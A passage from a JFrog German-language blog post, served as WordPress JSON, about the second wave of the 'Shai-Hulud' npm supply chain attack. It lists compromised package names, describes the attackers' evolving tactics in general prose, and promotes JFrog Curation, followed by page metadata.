    \nrxnt-healthchecks-nestjs@1.0.4
    \nrxnt-kue@1.0.4
    \nrxnt-kue@1.0.5
    \nrxnt-kue@1.0.6
    \nswc-plugin-component-annotate@1.9.1
    \ntbssnch@1.0.2
    \nteselagen-interval-tree@1.1.2
    \ntg-client-query-builder@2.14.4
    \ntg-client-query-builder@2.14.5
    \ntg-redbird@1.3.1
    \ntg-redbird@1.3.2
    \ntg-seq-gen@1.0.10
    \ntg-seq-gen@1.0.9
    \nthangved-react-grid@1.0.3
    \nts-gaussian@3.0.5
    \nts-imports@1.0.1
    \nts-imports@1.0.2
    \ntvi-cli@0.1.5
    \nve-bamreader@0.2.6
    \nve-bamreader@0.2.7
    \nve-editor@1.0.1
    \nve-editor@1.0.2
    \nverror-extra@6.0.1
    \nvoip-callkit@1.0.2
    \nvoip-callkit@1.0.3
    \nwdio-web-reporter@0.1.3
    \nyargs-help-output@5.0.3
    \nyoo-styles@6.0.326<\/p>\n
    November 2025: Die zweite Welle<\/h2>\n
    Der \u201eShai-Hulud\u201c Software Supply Chain Attack hat sich als anhaltende Bedrohung und nicht als einmaliger Vorfall erwiesen. Nur 10 Wochen nach der ersten Kampagne im September best\u00e4tigt JFrog Security Research die Entdeckung einer zweiten, deutlich komplexeren Angriffswelle. Auch wenn das Volumen der kompromittierten Packages (796 neue Malicious Packages) geringer ist als bei der ersten Welle (\u00fcber 1.150), deutet die gestiegene Raffinesse auf einen dedizierten Threat Actor hin, der seine Strategien gezielt weiterentwickelt. Diese R\u00fcckkehr signalisiert ein tieferliegendes Problem: Das Vertrauen in OSS-Packages wird massiv auf die Probe gestellt, was sie zu einem zentralen Risikofaktor f\u00fcr Developer, DevOps-Teams und Security Professionals macht.<\/p>\n
    Weiterentwicklung der Taktiken und Persistenz<\/h3>\n
    Diese zweite Welle zeigt ein klares Upgrade der Taktiken und best\u00e4tigt die Absicht der Angreifer, die Kampagne fortzusetzen und g\u00e4ngige Code- und Binary-Scanner zu umgehen. Im Gegensatz zum ersten Angriff, der vor allem auf maximales Volumen ausgelegt war, integriert die zweite Welle Obfuscation-Techniken mit modifizierten Payload-Delivery-Mechanismen. Der Akteur experimentiert aktiv mit neuer Infrastruktur, bewegt sich lateral zu neuen Hosting-Diensten und nutzt komplexe Command-and-Control (C2) Flows, die speziell darauf ausgelegt sind, heuristische und verhaltensbasierte Erkennungstools zu umgehen.<\/p>\n
    Dringender Handlungsbedarf f\u00fcr Security-Manager<\/h3>\n
    F\u00fcr CISOs und Security-Verantwortliche bedeutet dies: Das Risiko beschr\u00e4nkt sich nicht mehr nur auf bekannte, sch\u00e4dliche Packages. Es geht um unbekannte, sich evolvierende Bedrohungen, die von aktuellen L\u00f6sungen oft nicht detektiert werden. Dies verfestigt den Status der Kampagne als langfristiges, kontinuierliches operatives Risiko f\u00fcr jedes Unternehmen, das auf Open-Source-Registries angewiesen ist.<\/p>\n
    Angesichts der persistenten Natur dieses Angriffs m\u00fcssen Unternehmen \u00fcber reaktives Scanning hinausgehen und eine proaktive, plattformzentrierte Security Posture implementieren. Security-Manager und DevOps-Leads sollten umgehend alle aktiven Dependencies auditieren, die seit dem ersten Angriff im September gepullt wurden, und diese mit aktuellen Intelligence-Feeds abgleichen.<\/p>\n
    Grunds\u00e4tzlich unterstreicht dieser Vorfall die sofortige Notwendigkeit f\u00fcr ein kontinuierliches Supply Chain Monitoring und das Vetting von OSS-Packages. L\u00f6sungen wie JFrog Curation sind essenziell, um Bedrohungen zu blockieren, bevor sie in das Entwicklungs-\u00d6kosystem gelangen. Eine detaillierte technische Analyse der zweiten Welle, einschlie\u00dflich vollst\u00e4ndiger IOC-Listen, finden Sie in unserem kompletten Security Research Report. Dieser laufende Angriff verdeutlicht, wie gesch\u00e4ftskritisch es ist, Security direkt in den Development-Workflow zu integrieren, um sich vor zuk\u00fcnftigen Wellen zu sch\u00fctzen.<\/p>\n
    Bleiben Sie informiert: Speichern Sie das JFrog Security Research Center in Ihren Lesezeichen und vereinbaren Sie noch heute eine Demo von JFrog Curation, um auf diesen und k\u00fcnftige Angriffe vorbereitet zu sein.<\/p>\n","protected":false},"excerpt":{"rendered":"
    WICHTIGES UPDATE: Die R\u00fcckkehr von Shai-Hulud (24. November 2025) JFrog \u00fcberwacht, analysiert und dokumentiert fortlaufend eine neue Welle der \u201eShai-Hulud\u201c Software Supply Chain Attack. Nach der ersten Kampagne sind die Threat Actors mit ausgefeilteren Taktiken zur\u00fcckgekehrt und haben weitere 796 neue Malicious Packages in f\u00fchrenden Public Registries kompromittiert. Diese neue Welle unterscheidet sich in wesentlichen …<\/p>\n","protected":false},"author":370,"featured_media":156600,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[10157,9205],"tags":[10348],"class_list":["post-158527","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sicherheit-und-devsecops","category-unkategorisiert","tag-security-research-de","resource_categories-security-research"],"yoast_head":"\nShai-Hulud-Angriff \u2013 neue kompromittierte Pakete entdeckt | JFrog<\/title>\n<meta name=\"description\" content=\"Erfahren Sie mehr \u00fcber den anhaltenden Shai-Hulud-npm-Lieferkettenangriff \u2013 inklusive aller derzeit bekannten kompromittierten Pakete.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/posts\/158527\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt\" \/>\n<meta property=\"og:description\" content=\"Erfahren Sie mehr \u00fcber den anhaltenden Shai-Hulud-npm-Lieferkettenangriff \u2013 inklusive aller derzeit bekannten kompromittierten Pakete.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/\" \/>\n<meta property=\"og:site_name\" content=\"JFrog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/artifrog\" \/>\n<meta property=\"article:published_time\" content=\"2025-09-16T19:03:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-16T17:09:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png\" \/>\n\t<meta property=\"og:image:width\" content=\"203\" \/>\n\t<meta property=\"og:image:height\" content=\"148\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"shacharm\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@jfrog\" \/>\n<meta name=\"twitter:site\" content=\"@jfrog\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"shacharm\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"TechArticle\",\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/\"},\"author\":{\"name\":\"shacharm\",\"@id\":\"https:\/\/jfrog.com\/de\/#\/schema\/person\/f57bde3df1ce2f5bacb9b4bfecec785e\"},\"headline\":\"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt\",\"datePublished\":\"2025-09-16T19:03:27+00:00\",\"dateModified\":\"2025-12-16T17:09:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/\"},\"wordCount\":2020,\"publisher\":{\"@id\":\"https:\/\/jfrog.com\/de\/#organization\"},\"image\":{\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png\",\"keywords\":[\"security-research\"],\"articleSection\":[\"Sicherheit und DevSecOps\",\"Unkategorisiert\"],\"inLanguage\":\"de-DE\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/\",\"url\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/\",\"name\":\"Shai-Hulud-Angriff \u2013 neue kompromittierte Pakete entdeckt | JFrog\",\"isPartOf\":{\"@id\":\"https:\/\/jfrog.com\/de\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png\",\"datePublished\":\"2025-09-16T19:03:27+00:00\",\"dateModified\":\"2025-12-16T17:09:54+00:00\",\"description\":\"Erfahren Sie mehr \u00fcber den anhaltenden Shai-Hulud-npm-Lieferkettenangriff \u2013 inklusive aller derzeit bekannten kompromittierten Pakete.\",\"breadcrumb\":{\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage\",\"url\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png\",\"contentUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png\",\"width\":203,\"height\":148,\"caption\":\"JFrog Cuation vs Shai-Hulud npm attack\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jfrog.com\/de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jfrog.com\/de\/#website\",\"url\":\"https:\/\/jfrog.com\/de\/\",\"name\":\"JFrog\",\"description\":\"Deliver Trusted Software Releases at Speed and Scale\",\"publisher\":{\"@id\":\"https:\/\/jfrog.com\/de\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jfrog.com\/de\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"de-DE\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jfrog.com\/de\/#organization\",\"name\":\"JFrog\",\"url\":\"https:\/\/jfrog.com\/de\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\/\/jfrog.com\/de\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg\",\"contentUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg\",\"width\":74,\"height\":73,\"caption\":\"JFrog\"},\"image\":{\"@id\":\"https:\/\/jfrog.com\/de\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/artifrog\",\"https:\/\/x.com\/jfrog\",\"https:\/\/www.linkedin.com\/company\/455737\",\"https:\/\/www.youtube.com\/channel\/UCh2hNg76zo3d1qQqTWIQxDg\",\"https:\/\/www.wikidata.org\/wiki\/Q98608948\"],\"description\":\"We set out on our Liquid Software journey in 2008, with the mission to transform the way enterprises manage and release software updates. The world expects software to update continuously, securely, non-intrusively and without user intervention. This hyper-connected experience can only be enabled by automation with an end-to-end DevOps platform and a binary-centric focus. With this in mind, we\u2019ve developed the JFrog Platform, ushering in a new era of DevOps and DevSecOps standards that power continuous updates. More than a decade after our founding, with thousands of customers and millions of users globally, JFrog has become the \u201cDatabase of DevOps\u201d and the de-facto standard in release and update management.\",\"legalName\":\"Jfrog, Inc.\",\"numberOfEmployees\":{\"@type\":\"QuantitativeValue\",\"minValue\":\"1001\",\"maxValue\":\"5000\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/jfrog.com\/de\/#\/schema\/person\/f57bde3df1ce2f5bacb9b4bfecec785e\",\"name\":\"shacharm\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\/\/jfrog.com\/de\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/2c4d93cf392305aa291c49dcaf6d83e9d6ea82793a22d1b94709131dfff6ac45?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/2c4d93cf392305aa291c49dcaf6d83e9d6ea82793a22d1b94709131dfff6ac45?s=96&d=mm&r=g\",\"caption\":\"shacharm\"}}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Shai-Hulud-Angriff \u2013 neue kompromittierte Pakete entdeckt | JFrog","description":"Erfahren Sie mehr \u00fcber den anhaltenden Shai-Hulud-npm-Lieferkettenangriff \u2013 inklusive aller derzeit bekannten kompromittierten Pakete.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/posts\/158527","og_locale":"de_DE","og_type":"article","og_title":"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt","og_description":"Erfahren Sie mehr \u00fcber den anhaltenden Shai-Hulud-npm-Lieferkettenangriff \u2013 inklusive aller derzeit bekannten kompromittierten Pakete.","og_url":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/","og_site_name":"JFrog","article_publisher":"https:\/\/www.facebook.com\/artifrog","article_published_time":"2025-09-16T19:03:27+00:00","article_modified_time":"2025-12-16T17:09:54+00:00","og_image":[{"width":203,"height":148,"url":"https:\/\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png","type":"image\/png"}],"author":"shacharm","twitter_card":"summary_large_image","twitter_creator":"@jfrog","twitter_site":"@jfrog","twitter_misc":{"Written by":"shacharm","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"TechArticle","@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#article","isPartOf":{"@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/"},"author":{"name":"shacharm","@id":"https:\/\/jfrog.com\/de\/#\/schema\/person\/f57bde3df1ce2f5bacb9b4bfecec785e"},"headline":"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt","datePublished":"2025-09-16T19:03:27+00:00","dateModified":"2025-12-16T17:09:54+00:00","mainEntityOfPage":{"@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/"},"wordCount":2020,"publisher":{"@id":"https:\/\/jfrog.com\/de\/#organization"},"image":{"@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage"},"thumbnailUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png","keywords":["security-research"],"articleSection":["Sicherheit und DevSecOps","Unkategorisiert"],"inLanguage":"de-DE"},{"@type":"WebPage","@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/","url":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/","name":"Shai-Hulud-Angriff \u2013 neue kompromittierte Pakete entdeckt | JFrog","isPartOf":{"@id":"https:\/\/jfrog.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage"},"image":{"@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage"},"thumbnailUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png","datePublished":"2025-09-16T19:03:27+00:00","dateModified":"2025-12-16T17:09:54+00:00","description":"Erfahren Sie mehr \u00fcber den anhaltenden Shai-Hulud-npm-Lieferkettenangriff \u2013 inklusive aller derzeit bekannten kompromittierten Pakete.","breadcrumb":{"@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#primaryimage","url":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png","contentUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/08\/26212409\/Sec-Research_Blog_Thumbnail.png","width":203,"height":148,"caption":"JFrog Cuation vs Shai-Hulud npm attack"},{"@type":"BreadcrumbList","@id":"https:\/\/jfrog.com\/de\/blog\/shai-hulud-npm-supply-chain-attack-new-compromised-packages-detected\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jfrog.com\/de\/"},{"@type":"ListItem","position":2,"name":"Shai-Hulud npm Lieferkettenangriff \u2013 neue kompromittierte Pakete entdeckt"}]},{"@type":"WebSite","@id":"https:\/\/jfrog.com\/de\/#website","url":"https:\/\/jfrog.com\/de\/","name":"JFrog","description":"Deliver Trusted Software Releases at Speed and Scale","publisher":{"@id":"https:\/\/jfrog.com\/de\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jfrog.com\/de\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"},{"@type":"Organization","@id":"https:\/\/jfrog.com\/de\/#organization","name":"JFrog","url":"https:\/\/jfrog.com\/de\/","logo":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/jfrog.com\/de\/#\/schema\/logo\/image\/","url":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg","contentUrl":"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg","width":74,"height":73,"caption":"JFrog"},"image":{"@id":"https:\/\/jfrog.com\/de\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/artifrog","https:\/\/x.com\/jfrog","https:\/\/www.linkedin.com\/company\/455737","https:\/\/www.youtube.com\/channel\/UCh2hNg76zo3d1qQqTWIQxDg","https:\/\/www.wikidata.org\/wiki\/Q98608948"],"description":"We set out on our Liquid Software journey in 2008, with the mission to transform the way enterprises manage and release software updates. The world expects software to update continuously, securely, non-intrusively and without user intervention. This hyper-connected experience can only be enabled by automation with an end-to-end DevOps platform and a binary-centric focus. With this in mind, we\u2019ve developed the JFrog Platform, ushering in a new era of DevOps and DevSecOps standards that power continuous updates. More than a decade after our founding, with thousands of customers and millions of users globally, JFrog has become the \u201cDatabase of DevOps\u201d and the de-facto standard in release and update management.","legalName":"Jfrog, Inc.","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1001","maxValue":"5000"}},{"@type":"Person","@id":"https:\/\/jfrog.com\/de\/#\/schema\/person\/f57bde3df1ce2f5bacb9b4bfecec785e","name":"shacharm","image":{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/jfrog.com\/de\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/2c4d93cf392305aa291c49dcaf6d83e9d6ea82793a22d1b94709131dfff6ac45?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/2c4d93cf392305aa291c49dcaf6d83e9d6ea82793a22d1b94709131dfff6ac45?s=96&d=mm&r=g","caption":"shacharm"}}]}},"_links":{"self":[{"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/posts\/158527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/users\/370"}],"replies":[{"embeddable":true,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/comments?post=158527"}],"version-history":[{"count":6,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/posts\/158527\/revisions"}],"predecessor-version":[{"id":158529,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/posts\/158527\/revisions\/158529"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/media\/156600"}],"wp:attachment":[{"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/media?parent=158527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/categories?post=158527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jfrog.com\/de\/wp-json\/wp\/v2\/tags?post=158527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}